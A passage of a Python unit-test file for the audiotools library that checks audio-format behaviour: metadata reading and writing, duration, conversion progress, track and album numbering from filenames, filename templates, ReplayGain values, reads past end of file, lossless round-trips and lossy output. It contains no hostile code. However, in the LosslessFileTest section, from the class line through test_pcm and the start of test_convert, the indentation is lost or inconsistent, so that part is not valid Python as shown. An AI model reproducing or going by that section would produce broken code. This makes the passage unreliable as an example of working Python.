    # set/get/delete metadata plus IOError behavior on unwritable /
    # unreadable files
    @FORMAT_AUDIOFILE
    def test_metadata(self):
        import string

        if (self.audio_class is audiotools.AudioFile):
            return

        # one distinct letter per text field, one distinct integer
        # per integer field
        dummy_metadata = audiotools.MetaData(**dict(
            [(field, char) for (field, char) in
             zip(audiotools.MetaData.FIELDS,
                 string.ascii_letters)
             if field not in audiotools.MetaData.INTEGER_FIELDS] +
            [(field, i + 1) for (i, field) in
             enumerate(audiotools.MetaData.INTEGER_FIELDS)]))
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(temp.name,
                                              BLANK_PCM_Reader(1))
            track.set_metadata(dummy_metadata)
            track = audiotools.open(temp.name)
            metadata = track.get_metadata()
            if (metadata is None):
                # format doesn't support metadata; nothing more to test
                return

            #check that delete_metadata works
            nonblank_metadata = audiotools.MetaData(
                track_name=u"Track Name",
                track_number=1,
                track_total=2,
                album_name=u"Album Name")
            track.set_metadata(nonblank_metadata)
            self.assertEqual(track.get_metadata(), nonblank_metadata)
            track.delete_metadata()
            metadata = track.get_metadata()
            if (metadata is not None):
                self.assertEqual(
                    metadata,
                    audiotools.MetaData())

            track.set_metadata(nonblank_metadata)
            self.assertEqual(track.get_metadata(), nonblank_metadata)

            # read-only file (0400): writes must fail, reads still work
            old_mode = os.stat(track.filename).st_mode
            os.chmod(track.filename, 0400)
            try:
                #check IOError on set_metadata()
                self.assertRaises(IOError,
                                  track.set_metadata,
                                  audiotools.MetaData(track_name=u"Foo"))

                #check IOError on delete_metadata()
                self.assertRaises(IOError,
                                  track.delete_metadata)
            finally:
                os.chmod(track.filename, old_mode)

            # fully unreadable file (mode 0): reads must fail too
            os.chmod(track.filename, 0)
            try:
                #check IOError on get_metadata()
                self.assertRaises(IOError,
                                  track.get_metadata)
            finally:
                os.chmod(track.filename, old_mode)
        finally:
            temp.close()

    # seconds_length() must round-trip the encoded duration
    @FORMAT_AUDIOFILE
    def test_length(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for seconds in [1, 2, 3, 4, 5, 10, 20, 60, 120]:
                track = self.audio_class.from_pcm(temp.name,
                                                  BLANK_PCM_Reader(seconds))
                self.assertEqual(int(track.seconds_length()), seconds)
        finally:
            temp.close()

    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_pcm(self):
        self.assert_(False)

    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_convert(self):
        self.assert_(False)

    # convert() must invoke the progress callback with consistent totals
    # and monotonically non-decreasing current values
    @FORMAT_AUDIOFILE
    def test_convert_progress(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(temp.name,
                                              BLANK_PCM_Reader(10))
            if (track.lossless()):
                self.assert_(audiotools.pcm_frame_cmp(
                    track.to_pcm(),
                    BLANK_PCM_Reader(10)) is None)
            for audio_class in audiotools.AVAILABLE_TYPES:
                outfile = tempfile.NamedTemporaryFile(
                    suffix="." + audio_class.SUFFIX)
                log = Log()
                try:
                    track2 = track.convert(outfile.name,
                                           audio_class,
                                           progress=log.update)
                    self.assert_(len(log.results) > 0,
                                 "no logging converting %s to %s" %
                                 (self.audio_class.NAME,
                                  audio_class.NAME))
                    # all callbacks must report the same total (arg 1)
                    self.assert_(len(set([r[1] for r in log.results])) == 1)
                    # current value (arg 0) must never decrease
                    for x, y in zip(log.results[1:], log.results):
                        self.assert_((x[0] - y[0]) >= 0)
                    if (track.lossless() and track2.lossless()):
                        self.assert_(audiotools.pcm_frame_cmp(
                            track.to_pcm(), track2.to_pcm()) is None,
                            "PCM mismatch converting %s to %s" % (
                                self.audio_class.NAME,
                                audio_class.NAME))
                finally:
                    outfile.close()
        finally:
            temp.close()

    # track_number() may be derived from the filename when metadata
    # is absent, and metadata takes precedence when present
    @FORMAT_AUDIOFILE
    def test_track_number(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        temp_dir = tempfile.mkdtemp()
        try:
            track = self.audio_class.from_pcm(
                os.path.join(temp_dir, "abcde" + self.suffix),
                BLANK_PCM_Reader(1))
            if (track.get_metadata() is None):
                # metadata-less formats: number comes from the filename
                self.assertEqual(track.track_number(), None)

                track = self.audio_class.from_pcm(
                    os.path.join(temp_dir, "01 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.assertEqual(track.track_number(), 1)

                track = self.audio_class.from_pcm(
                    os.path.join(temp_dir, "202 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.assertEqual(track.track_number(), 2)

                track = self.audio_class.from_pcm(
                    os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.assertEqual(track.track_number(), 3)
            else:
                self.audio_class.from_pcm(
                    os.path.join(temp_dir, "01 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.audio_class.from_pcm(
                    os.path.join(temp_dir, "202 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.audio_class.from_pcm(
                    os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))

            track.set_metadata(audiotools.MetaData(track_number=2))
            metadata = track.get_metadata()
            if (metadata is not None):
                # explicit metadata overrides any filename-derived number
                self.assertEqual(track.track_number(), 2)

                track = audiotools.open(
                    os.path.join(temp_dir, "202 - abcde" + self.suffix))
                track.set_metadata(audiotools.MetaData(track_number=1))
                self.assertEqual(track.get_metadata().track_number, 1)

                track = audiotools.open(
                    os.path.join(temp_dir, "01 - abcde" + self.suffix))
                track.set_metadata(audiotools.MetaData(track_number=3))
                self.assertEqual(track.get_metadata().track_number, 3)

                track = audiotools.open(
                    os.path.join(temp_dir, "abcde" + self.suffix))
                track.set_metadata(audiotools.MetaData(track_number=4))
                self.assertEqual(track.get_metadata().track_number, 4)
        finally:
            for f in os.listdir(temp_dir):
                os.unlink(os.path.join(temp_dir, f))
            os.rmdir(temp_dir)

    # album_number(): same filename-vs-metadata rules as track_number()
    @FORMAT_AUDIOFILE
    def test_album_number(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        temp_dir = tempfile.mkdtemp()
        try:
            track = self.audio_class.from_pcm(
                os.path.join(temp_dir, "abcde" + self.suffix),
                BLANK_PCM_Reader(1))
            if (track.get_metadata() is None):
                self.assertEqual(track.album_number(), None)

                track = self.audio_class.from_pcm(
                    os.path.join(temp_dir, "01 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.assertEqual(track.album_number(), None)

                track = self.audio_class.from_pcm(
                    os.path.join(temp_dir, "202 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                if (track.get_metadata() is None):
                    # "202" parses as album 2, track 02
                    self.assertEqual(track.album_number(), 2)

                track = self.audio_class.from_pcm(
                    os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                if (track.get_metadata() is None):
                    self.assertEqual(track.album_number(), 3)
            else:
                self.audio_class.from_pcm(
                    os.path.join(temp_dir, "01 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.audio_class.from_pcm(
                    os.path.join(temp_dir, "202 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))
                self.audio_class.from_pcm(
                    os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
                    BLANK_PCM_Reader(1))

            track.set_metadata(audiotools.MetaData(album_number=2))
            metadata = track.get_metadata()
            if (metadata is not None):
                self.assertEqual(track.album_number(), 2)

                track = audiotools.open(
                    os.path.join(temp_dir, "202 - abcde" + self.suffix))
                track.set_metadata(audiotools.MetaData(album_number=1))
                self.assertEqual(track.album_number(), 1)

                track = audiotools.open(
                    os.path.join(temp_dir, "01 - abcde" + self.suffix))
                track.set_metadata(audiotools.MetaData(album_number=3))
                self.assertEqual(track.album_number(), 3)

                track = audiotools.open(
                    os.path.join(temp_dir, "abcde" + self.suffix))
                track.set_metadata(audiotools.MetaData(album_number=4))
                self.assertEqual(track.album_number(), 4)
        finally:
            for f in os.listdir(temp_dir):
                os.unlink(os.path.join(temp_dir, f))
            os.rmdir(temp_dir)

    # track_name() template expansion: every substitution variable,
    # metadata-vs-filename precedence, and template error handling
    @FORMAT_AUDIOFILE
    def test_track_name(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        format_template = u"Fo\u00f3 %%(%(field)s)s"
        #first, test the many unicode string fields
        for field in audiotools.MetaData.FIELDS:
            if (field not in audiotools.MetaData.INTEGER_FIELDS):
                metadata = audiotools.MetaData()
                value = u"\u00dcnicode value \u2ec1"
                setattr(metadata, field, value)
                format_string = format_template % {u"field":
                                                   field.decode('ascii')}
                track_name = self.audio_class.track_name(
                    file_path="track",
                    track_metadata=metadata,
                    format=format_string.encode('utf-8'))
                self.assert_(len(track_name) > 0)
                self.assertEqual(
                    track_name,
                    (format_template % {u"field": u"foo"} % \
                     {u"foo": value}).encode(audiotools.FS_ENCODING))

        #then, check integer fields
        format_template = (u"Fo\u00f3 %(album_number)d " +
                           u"%(track_number)2.2d %(album_track_number)s")

        #first, check integers pulled from track metadata
        for (track_number, album_number, album_track_number) in [
            (0, 0, u"00"),
            (1, 0, u"01"),
            (25, 0, u"25"),
            (0, 1, u"100"),
            (1, 1, u"101"),
            (25, 1, u"125"),
            (0, 36, u"3600"),
            (1, 36, u"3601"),
            (25, 36, u"3625")]:
            for basepath in ["track",
                             "/foo/bar/track",
                             (u"/f\u00f3o/bar/tr\u00e1ck").encode(
                                 audiotools.FS_ENCODING)]:
                metadata = audiotools.MetaData(track_number=track_number,
                                               album_number=album_number)
                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath,
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template % {
                        u"album_number": album_number,
                        u"track_number": track_number,
                        u"album_track_number": album_track_number}
                     ).encode('utf-8'))

        #then, check integers pulled from the track filename
        #(a None metadata falls back to the filename digits;
        # a blank MetaData yields zeros)
        for metadata in [None, audiotools.MetaData()]:
            for basepath in ["track",
                             "/foo/bar/track",
                             (u"/f\u00f3o/bar/tr\u00e1ck").encode(
                                 audiotools.FS_ENCODING)]:
                if (metadata is None):
                    album_number = 0
                    track_number = 1
                    album_track_number = u"01"
                else:
                    album_number = 0
                    track_number = 0
                    album_track_number = u"00"

                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath + "01",
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"album_number": album_number,
                      u"track_number": track_number,
                      u"album_track_number": album_track_number}
                     ).encode('utf-8'))

                if (metadata is None):
                    album_number = 0
                    track_number = 23
                    album_track_number = u"23"
                else:
                    album_number = 0
                    track_number = 0
                    album_track_number = u"00"

                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath + "track23",
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"album_number": album_number,
                      u"track_number": track_number,
                      u"album_track_number": album_track_number}
                     ).encode('utf-8'))

                if (metadata is None):
                    album_number = 1
                    track_number = 23
                    album_track_number = u"123"
                else:
                    album_number = 0
                    track_number = 0
                    album_track_number = u"00"

                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath + "track123",
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"album_number": album_number,
                      u"track_number": track_number,
                      u"album_track_number": album_track_number}
                     ).encode('utf-8'))

                if (metadata is None):
                    album_number = 45
                    track_number = 67
                    album_track_number = u"4567"
                else:
                    album_number = 0
                    track_number = 0
                    album_track_number = u"00"

                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath + "4567",
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"album_number": album_number,
                      u"track_number": track_number,
                      u"album_track_number": album_track_number}
                     ).encode('utf-8'))

        #then, ensure metadata takes precedence over filename for integers
        for (track_number, album_number,
             album_track_number, incorrect) in [(1, 0, u"01", "10"),
                                                (25, 0, u"25", "52"),
                                                (1, 1, u"101", "210"),
                                                (25, 1, u"125", "214"),
                                                (1, 36, u"3601", "4710"),
                                                (25, 36, u"3625", "4714")]:
            for basepath in ["track",
                             "/foo/bar/track",
                             (u"/f\u00f3o/bar/tr\u00e1ck").encode(
                                 audiotools.FS_ENCODING)]:
                metadata = audiotools.MetaData(track_number=track_number,
                                               album_number=album_number)
                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath + incorrect,
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"album_number": album_number,
                      u"track_number": track_number,
                      u"album_track_number": album_track_number}
                     ).encode('utf-8'))

        #also, check track_total/album_total from metadata
        format_template = u"Fo\u00f3 %(track_total)d %(album_total)d"
        for track_total in [0, 1, 25, 99]:
            for album_total in [0, 1, 25, 99]:
                metadata = audiotools.MetaData(track_total=track_total,
                                               album_total=album_total)
                self.assertEqual(self.audio_class.track_name(
                    file_path=basepath + incorrect,
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"track_total": track_total,
                      u"album_total": album_total}
                     ).encode('utf-8'))

        #ensure %(basename)s is set properly
        format_template = u"Fo\u00f3 %(basename)s"
        for (path, base) in [("track", "track"),
                             ("/foo/bar/track", "track"),
                             ((u"/f\u00f3o/bar/tr\u00e1ck").encode(
                                 audiotools.FS_ENCODING), u"tr\u00e1ck")]:
            for metadata in [None, audiotools.MetaData()]:
                self.assertEqual(self.audio_class.track_name(
                    file_path=path,
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"basename": base}).encode('utf-8'))

        #ensure %(suffix)s is set properly
        format_template = u"Fo\u00f3 %(suffix)s"
        for path in ["track",
                     "/foo/bar/track",
                     (u"/f\u00f3o/bar/tr\u00e1ck").encode(
                         audiotools.FS_ENCODING)]:
            for metadata in [None, audiotools.MetaData()]:
                self.assertEqual(self.audio_class.track_name(
                    file_path=path,
                    track_metadata=metadata,
                    format=format_template.encode('utf-8')),
                    (format_template %
                     {u"suffix":
                      self.audio_class.SUFFIX.decode(
                          'ascii')}).encode('utf-8'))

        for metadata in [None, audiotools.MetaData()]:
            #unsupported template fields raise UnsupportedTracknameField
            self.assertRaises(audiotools.UnsupportedTracknameField,
                              self.audio_class.track_name,
                              "", metadata,
                              "%(foo)s")

            #broken template fields raise InvalidFilenameFormat
            self.assertRaises(audiotools.InvalidFilenameFormat,
                              self.audio_class.track_name,
                              "", metadata, "%")
            self.assertRaises(audiotools.InvalidFilenameFormat,
                              self.audio_class.track_name,
                              "", metadata, "%{")
            self.assertRaises(audiotools.InvalidFilenameFormat,
                              self.audio_class.track_name,
                              "", metadata, "%[")
            self.assertRaises(audiotools.InvalidFilenameFormat,
                              self.audio_class.track_name,
                              "", metadata, "%(")
            self.assertRaises(audiotools.InvalidFilenameFormat,
                              self.audio_class.track_name,
                              "", metadata, "%(track_name")
            self.assertRaises(audiotools.InvalidFilenameFormat,
                              self.audio_class.track_name,
                              "", metadata, "%(track_name)")

    # ReplayGain values written by add_replay_gain() must match an
    # independently-computed reference to 4 decimal places
    @FORMAT_AUDIOFILE
    def test_replay_gain(self):
        if (self.audio_class.supports_replay_gain() and
            self.audio_class.lossless_replay_gain()):
            track_data1 = test_streams.Sine16_Stereo(44100, 44100,
                                                     441.0, 0.50,
                                                     4410.0, 0.49, 1.0)

            track_data2 = test_streams.Sine16_Stereo(66150, 44100,
                                                     8820.0, 0.70,
                                                     4410.0, 0.29, 1.0)

            track_data3 = test_streams.Sine16_Stereo(52920, 44100,
                                                     441.0, 0.50,
                                                     441.0, 0.49, 0.5)

            track_file1 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            track_file2 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            track_file3 = tempfile.NamedTemporaryFile(
                suffix="." + self.audio_class.SUFFIX)
            try:
                track1 = self.audio_class.from_pcm(track_file1.name,
                                                   track_data1)
                track2 = self.audio_class.from_pcm(track_file2.name,
                                                   track_data2)
                track3 = self.audio_class.from_pcm(track_file3.name,
                                                   track_data3)

                # no gain info before add_replay_gain() is called
                self.assert_(track1.replay_gain() is None)
                self.assert_(track2.replay_gain() is None)
                self.assert_(track3.replay_gain() is None)

                self.audio_class.add_replay_gain([track_file1.name,
                                                  track_file2.name,
                                                  track_file3.name])

                self.assert_(track1.replay_gain() is not None)
                self.assert_(track2.replay_gain() is not None)
                self.assert_(track3.replay_gain() is not None)

                # recompute reference gains directly from the PCM data
                gains = audiotools.replaygain.ReplayGain(44100)

                track_data1.reset()
                track_gain1 = track1.replay_gain()
                (track_gain, track_peak) = gains.title_gain(track_data1)
                self.assertEqual(round(track_gain1.track_gain, 4),
                                 round(track_gain, 4))
                self.assertEqual(round(track_gain1.track_peak, 4),
                                 round(track_peak, 4))

                track_data2.reset()
                track_gain2 = track2.replay_gain()
                (track_gain, track_peak) = gains.title_gain(track_data2)
                self.assertEqual(round(track_gain2.track_gain, 4),
                                 round(track_gain, 4))
                self.assertEqual(round(track_gain2.track_peak, 4),
                                 round(track_peak, 4))

                track_data3.reset()
                track_gain3 = track3.replay_gain()
                (track_gain, track_peak) = gains.title_gain(track_data3)
                self.assertEqual(round(track_gain3.track_gain, 4),
                                 round(track_gain, 4))
                self.assertEqual(round(track_gain3.track_peak, 4),
                                 round(track_peak, 4))

                # album gain/peak must be identical across all tracks
                album_gains = [round(t.replay_gain().album_gain, 4) for t in
                               [track1, track2, track3]]
                self.assertEqual(len(set(album_gains)), 1)
                album_peaks = [round(t.replay_gain().album_peak, 4) for t in
                               [track1, track2, track3]]
                self.assertEqual(len(set(album_peaks)), 1)

                (album_gain, album_peak) = gains.album_gain()
                self.assertEqual(album_gains[0], round(album_gain, 4))
                self.assertEqual(album_peaks[0], round(album_peak, 4))

                #FIXME - check that add_replay_gain raises
                #an exception when files are unreadable

                #FIXME - check that add_replay_gain raises
                #an exception when files are unwritable

                #FIXME - check that add_replay_gain raises
                #an exception when reading files produces an error
            finally:
                track_file1.close()
                track_file2.close()
                track_file3.close()

    # reads past EOF return empty FrameLists; reads after close()
    # raise ValueError
    @FORMAT_AUDIOFILE
    def test_read_after_eof(self):
        if (self.audio_class is audiotools.AudioFile):
            return None

        #build basic file
        temp_file = tempfile.NamedTemporaryFile(
            suffix="." + self.audio_class.SUFFIX)
        try:
            #build a generic file of silence
            temp_track = self.audio_class.from_pcm(
                temp_file.name,
                EXACT_SILENCE_PCM_Reader(44100))

            #read all the PCM frames from the file
            pcmreader = temp_track.to_pcm()
            f = pcmreader.read(4000)
            while (len(f) > 0):
                f = pcmreader.read(4000)
            self.assertEqual(len(f), 0)

            #then ensure subsequent reads return blank FrameList objects
            #without triggering an error
            for i in xrange(10):
                f = pcmreader.read(4000)
                self.assertEqual(len(f), 0)

            pcmreader.close()
            self.assertRaises(ValueError,
                              pcmreader.read,
                              4000)
        finally:
            temp_file.close()

    # a failing PCMReader must produce an EncodingError and no
    # partially-written output file
    @FORMAT_AUDIOFILE
    def test_invalid_from_pcm(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        #test our ERROR_PCM_Reader works
        self.assertRaises(ValueError,
                          ERROR_PCM_Reader(ValueError("error"),
                                           failure_chance=1.0).read,
                          1)
        self.assertRaises(IOError,
                          ERROR_PCM_Reader(IOError("error"),
                                           failure_chance=1.0).read,
                          1)

        #ensure that our dummy file doesn't exist
        dummy_filename = "invalid." + self.audio_class.SUFFIX
        self.assert_(not os.path.isfile(dummy_filename))

        #a decoder that raises IOError on to_pcm()
        #should trigger an EncodingError
        self.assertRaises(audiotools.EncodingError,
                          self.audio_class.from_pcm,
                          dummy_filename,
                          ERROR_PCM_Reader(IOError("I/O Error")))

        #and ensure invalid files aren't left lying around
        self.assert_(not os.path.isfile(dummy_filename))

        #a decoder that raises ValueError on to_pcm()
        #should trigger an EncodingError
        self.assertRaises(audiotools.EncodingError,
                          self.audio_class.from_pcm,
                          dummy_filename,
                          ERROR_PCM_Reader(ValueError("Value Error")))

        #and ensure invalid files aren't left lying around
        self.assert_(not os.path.isfile(dummy_filename))

    #FIXME
    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_cuesheet(self):
        self.assert_(False)

    #FIXME
    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_verify(self):
        self.assert_(False)
class LosslessFileTest(AudioFileTest):
@FORMAT_LOSSLESS
def test_lossless(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(1))
self.assertEqual(track.lossless(), True)
track = audiotools.open(temp.name)
self.assertEqual(track.lossless(), True)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_channels(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for channels in [1, 2, 3, 4, 5, 6]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=channels, channel_mask=0))
self.assertEqual(track.channels(), channels)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), channels)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_channel_mask(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for mask in [["front_center"],
["front_left",
"front_right"],
["front_left",
"front_right",
"front_center"],
["front_left",
"front_right",
"back_left",
"back_right"],
["front_left",
"front_right",
"front_center",
"back_left",
"back_right"],
["front_left",
"front_right",
"front_center",
"low_frequency",
"back_left",
"back_right"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
if (int(track.channel_mask()) != 0):
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_sample_rate(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for rate in [8000, 16000, 22050, 44100, 48000,
96000, 192000]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, sample_rate=rate))
self.assertEqual(track.sample_rate(), rate)
track = audiotools.open(temp.name)
self.assertEqual(track.sample_rate(), rate)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_pcm(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
temp2 = tempfile.NamedTemporaryFile()
temp_dir = tempfile.mkdtemp()
try:
for compression in (None,) + self.audio_class.COMPRESSION_MODES:
#test silence
reader = MD5_Reader(BLANK_PCM_Reader(1))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test random noise
reader = MD5_Reader(RANDOM_PCM_Reader(1))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test randomly-sized chunks of silence
reader = MD5_Reader(Variable_Reader(BLANK_PCM_Reader(10)))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test randomly-sized chunks of random noise
reader = MD5_Reader(Variable_Reader(RANDOM_PCM_Reader(10)))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test PCMReaders that trigger a DecodingError
self.assertRaises(ValueError,
ERROR_PCM_Reader(ValueError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(IOError,
ERROR_PCM_Reader(IOError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
os.path.join(temp_dir,
"invalid" + self.suffix),
ERROR_PCM_Reader(IOError("I/O Error")))
self.assertEqual(os.path.isfile(
os.path.join(temp_dir,
"invalid" + self.suffix)),
False)
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
os.path.join(temp_dir,
"invalid" + self.suffix),
ERROR_PCM_Reader(IOError("I/O Error")))
self.assertEqual(os.path.isfile(
os.path.join(temp_dir,
"invalid" + self.suffix)),
False)
#test unwritable output file
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
"/dev/null/foo.%s" % (self.suffix),
BLANK_PCM_Reader(1))
#test without suffix
reader = MD5_Reader(BLANK_PCM_Reader(1))
if (compression is None):
track = self.audio_class.from_pcm(temp2.name, reader)
else:
track = self.audio_class.from_pcm(temp2.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
finally:
temp.close()
temp2.close()
for f in os.listdir(temp_dir):
os.unlink(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
@FORMAT_LOSSLESS
def test_convert(self):
    """Verify AudioFile.convert() round-trips to every available format.

    The source track is converted to each class in
    audiotools.AVAILABLE_TYPES, first with default compression and then
    once per mode in that class's COMPRESSION_MODES.  Lossless targets
    must reproduce the PCM data exactly; lossy targets are only checked
    for total stream length.  Converting to an unwritable path must
    raise audiotools.EncodingError in every case.
    """
    # the base AudioFile class is abstract; nothing to test
    if (self.audio_class is audiotools.AudioFile):
        return
    #check various round-trip options
    temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
    try:
        # 441000 frames at 44100Hz = a 10 second two-tone stereo sine
        track = self.audio_class.from_pcm(
            temp.name,
            test_streams.Sine16_Stereo(441000, 44100,
                                       8820.0, 0.70, 4410.0, 0.29, 1.0))
        for audio_class in audiotools.AVAILABLE_TYPES:
            temp2 = tempfile.NamedTemporaryFile(
                suffix="." + audio_class.SUFFIX)
            try:
                # conversion with default (implicit) compression
                track2 = track.convert(temp2.name,
                                       audio_class)
                if (track2.lossless()):
                    # lossless target: PCM streams must match exactly
                    self.assert_(
                        audiotools.pcm_frame_cmp(track.to_pcm(),
                                                 track2.to_pcm()) is None,
                        "error round-tripping %s to %s" % \
                            (self.audio_class.NAME,
                             audio_class.NAME))
                else:
                    # lossy target: only verify the stream length
                    # (10 seconds, counted via FrameCounter)
                    pcm = track2.to_pcm()
                    counter = FrameCounter(pcm.channels,
                                           pcm.bits_per_sample,
                                           pcm.sample_rate)
                    audiotools.transfer_framelist_data(pcm,
                                                       counter.update)
                    self.assertEqual(
                        int(counter), 10,
                        "mismatch encoding %s (%s/%d != %s)" % \
                            (audio_class.NAME,
                             counter,
                             int(counter),
                             10))
                # unwritable target path must raise EncodingError
                self.assertRaises(audiotools.EncodingError,
                                  track.convert,
                                  "/dev/null/foo.%s" % \
                                      (audio_class.SUFFIX),
                                  audio_class)
                # repeat the conversion at every supported quality level
                for compression in audio_class.COMPRESSION_MODES:
                    track2 = track.convert(temp2.name,
                                           audio_class,
                                           compression)
                    if (track2.lossless()):
                        self.assert_(
                            audiotools.pcm_frame_cmp(
                                track.to_pcm(), track2.to_pcm()) is None,
                            "error round-tripping %s to %s at %s" % \
                                (self.audio_class.NAME,
                                 audio_class.NAME,
                                 compression))
                    else:
                        # counter parameters come from one reader while a
                        # fresh to_pcm() stream is counted; both describe
                        # the same file so the length check is unaffected
                        pcm = track2.to_pcm()
                        counter = FrameCounter(pcm.channels,
                                               pcm.bits_per_sample,
                                               pcm.sample_rate)
                        audiotools.transfer_framelist_data(track2.to_pcm(),
                                                           counter.update)
                        self.assertEqual(
                            int(counter), 10,
                            ("mismatch encoding %s " +
                             "at quality %s (%s != %s)") % \
                                (audio_class.NAME, compression,
                                 counter, 10))
                    #check some obvious failures
                    self.assertRaises(audiotools.EncodingError,
                                      track.convert,
                                      "/dev/null/foo.%s" % \
                                          (audio_class.SUFFIX),
                                      audio_class,
                                      compression)
            finally:
                temp2.close()
    finally:
        temp.close()
class LossyFileTest(AudioFileTest):
    """Base test case for lossy audio formats.

    These tests assume the format normalizes its output to
    2 channels of 16 bits-per-sample at 44100Hz, so they check
    normalized stream parameters and total length rather than
    exact PCM data.  Concrete subclasses set self.audio_class
    and self.suffix in setUp().
    """

    @FORMAT_LOSSY
    def test_bits_per_sample(self):
        """Any input bits-per-sample must be normalized to 16."""
        if (self.audio_class is audiotools.AudioFile):
            return
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for bps in (8, 16, 24):
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, bits_per_sample=bps))
                # freshly-encoded and re-opened tracks both report 16bps
                self.assertEqual(track.bits_per_sample(), 16)
                track2 = audiotools.open(temp.name)
                self.assertEqual(track2.bits_per_sample(), 16)
        finally:
            temp.close()

    @FORMAT_LOSSY
    def test_lossless(self):
        """A lossy format must report lossless() == False."""
        if (self.audio_class is audiotools.AudioFile):
            return
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(1))
